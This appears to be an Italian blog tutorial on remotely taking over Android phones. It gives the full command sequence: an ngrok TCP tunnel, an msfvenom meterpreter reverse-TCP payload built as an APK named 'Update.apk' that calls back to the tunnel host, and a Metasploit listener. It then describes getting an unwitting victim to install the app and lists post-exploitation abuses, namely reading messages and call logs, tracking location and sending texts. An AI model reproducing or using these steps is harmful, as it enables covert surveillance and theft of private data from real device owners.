Hacking Android Device [Remotely]

Hacking over WAN

Puoi controllare il mio Video-tutorial su youtube qui:
https://youtu.be/Bbp-AcejtHI

Di solito in WAN, prima devi avere un IP/Hostname statico e secondo, devi fare il Port Forwarding per permettere la trasmissione del tuo traffico, e tutti noi sappiamo che entrambi sono così difficili in tempo reale come abbiamo accesso limitato alle porte in una rete.

Quindi, quello che faremo in questo scenario, creeremo un tunnel sicuro usando Ngrok.

Ngrok è un sistema di tunneling reverse proxy che stabilisce tunnel da un endpoint pubblico, cioè internet, a un servizio di rete in esecuzione localmente. Questo può aiutarci a creare un URL HTTP/HTTPS pubblico per un sito web in esecuzione localmente nella nostra macchina. Non abbiamo bisogno di fare alcun tipo di port forwarding mentre usiamo Ngrok e il nostro servizio di rete alla fine si esporrà a internet con l’aiuto del tunneling TCP.

Seguite questi passi per procedere:

Step1: Iscriviti all’account Ngrok per scaricarlo.

Prima di tutto, dovrete iscrivervi all’account Ngrok, dopo di che vi verrà richiesta la finestra di download.

Finestra di registrazione di Ngrok

Dopo la registrazione, puoi scaricare Ngrok per il tuo sistema Linux.

Semplicemente decomprimi il file scaricato.

Step2: Connetti il tuo account

Eseguendo questo comando aggiungerai il tuo auth token al file di configurazione di default ngrok.yml. Questo ti garantirà l’accesso a più funzioni e tempi di sessione più lunghi. (Devi copiare e incollare il tuo token qui fornito nella schermata iniziale di ngrok dopo il login)

./ngrok authtoken <il tuo token>

Ora sei pronto per usare questo strumento. Aprite il vostro terminale e spostatevi nella directory dove avete estratto lo strumento Ngrock e digitate:

./ngrok tcp

scegliete un numero di porta su cui volete legare una connessione (qui, ho scelto 5555 come numero di porta). E dopo aver premuto su enter, apparirà una schermata come questa.

L’inoltro qui specifica il tunnel TCP che ngrok ha creato. La connessione si è legata al localhost alla porta 5555. Ora abbiamo bisogno di generare un payload malevolo usando msfvenom.

Step3: Generazione del Payload

Puoi farlo aprendo un nuovo terminale nella tua macchina Kali Linux e digitando il seguente codice.

msfvenom -p android/meterpreter/reverse_tcp LHOST=2.tcp.ngrok.io LPORT=15787 R> .apk

Ma ricordate, questa volta è un po’ diverso dall’attacco che abbiamo usato per eseguire nella LAN. Qui al posto dell’indirizzo IP, dovremo inserire il link di inoltro fornito in ngrok (2.tcp.ngrok.io). E il numero di porta sarà 15787. Ricorda che, è importante inserire lo stesso numero di porta fornito da Ngrok nel port forwarding.

Nota: Se inserire l’indirizzo IP come 2.tcp.ngrok.io non funziona, puoi sostituirlo con un indirizzo IP che puoi ottenere usando il comando “ping”.
Apri un terminale e digita ping 2.tcp.ngrok.io e premi invio. Otterrete un indirizzo IP che dovrete mettere al posto di LHOST.

Qui ho usato “Update.apk” come nome del file per il nostro payload. Questo file deve essere installato nel dispositivo Android del nostro obiettivo. Ma prima di installare questo file, dobbiamo impostare il nostro ascoltatore. Per farlo, seguite il passo 4.

Step4: Set-Up a Listener

Apri il tuo terminale e carica la console di Metasploit, digitando: msfconsole
Dopo il caricamento (dopo pochi secondi), carica l’exploit multi-handler digitando:

use exploit/multi/handler

Ora impostate un payload inverso digitando:

set payload android/meterpreter/reverse_tcp

Imposta il tuo LHOST come 0.0.0.0 e LPORT come 5555
(Il numero di porta dovrebbe essere uguale al numero di porta che è stato usato per legare la connessione nel ngrok)

set LHOST 0.0.0.0
set LPORT 5555

Finalmente, digitare exploit per avviare l’ascoltatore.

La modalità di ascolto è attiva

Step5: Installa il file Malicious Update.apk nel dispositivo dell’obiettivo

Fai installare l’app alla vittima, ed eseguila appena installata. Quando la vittima tocca l’opzione open app, si otterrà l’accesso a tutte le funzioni del dispositivo Android. Tuttavia, nulla verrà visualizzato sullo schermo del dispositivo dopo che l’app viene aperta.

Post-Exploitation

Come aiuto per vedere le varie opzioni che puoi usare per eseguire i diversi compiti sul dispositivo della vittima. Puoi controllare i loro messaggi, i registri delle chiamate e salvarli anche nel tuo sistema.
Inoltre, è possibile visualizzare e aprire qualsiasi applicazione installata sul loro dispositivo. Puoi anche ottenere le coordinate della posizione attuale dell’utente. Puoi anche inviare messaggi a qualsiasi numero di contatto attraverso il loro dispositivo.

Lascia un commento

Il tuo indirizzo email non sarà pubblicato.